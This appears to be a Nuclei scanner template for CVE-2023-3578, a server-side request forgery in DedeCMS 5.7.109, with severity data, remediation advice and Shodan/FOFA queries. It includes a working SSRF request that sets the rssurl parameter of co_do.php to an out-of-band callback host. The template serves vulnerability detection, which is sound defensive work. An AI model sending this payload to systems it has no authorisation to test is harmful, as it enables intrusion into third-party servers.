id: CVE-2023-3578 info: name: DedeCMS 5.7.109 - Server-Side Request Forgery author: ritikchaddha severity: critical description: | Manipulation of the rssurl parameter in co_do.php leads to server-side request forgery in DedeCMS version 5.7.109. impact: | Successful exploitation could lead to sensitive data exposure, server-side request forgery, and potential server compromise. remediation: | Apply the vendor-supplied patch or update to a non-vulnerable version of DedeCMS. reference: - https://github.com/nightcloudos/cve/blob/main/SSRF.md - https://nvd.nist.gov/vuln/detail/CVE-2023-3578 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3578 cwe-id: CWE-918 epss-score: 0.0357 epss-percentile: 0.88137 cpe: cpe:2.3:a:dedecms:dedecms:5.7.109:*:*:*:*:*:*:* metadata: vendor: dedecms product: dedecms shodan-query: http.html:"DedeCms" fofa-query: app="DedeCMS" tags: cve,cve2023,dedecms,ssrf,oast,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 matchers: - type: word part: response words: - "DedeCms" case-insensitive: true - raw: - | GET /co_do.php?rssurl=https://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: interactsh_protocol words: - "dns" - "http" # digest: 4a0a00473045022100813ae0f8e0abcc0d9da0aaa3c61c723dfdac0e224c9141964e46869a8cd474dd02204706a5af3277d1ffaee1b5d8fcbbe64786fa467b380bd548bd9e8f2177d83e31:922c64590222798bb761d5b6d8e72950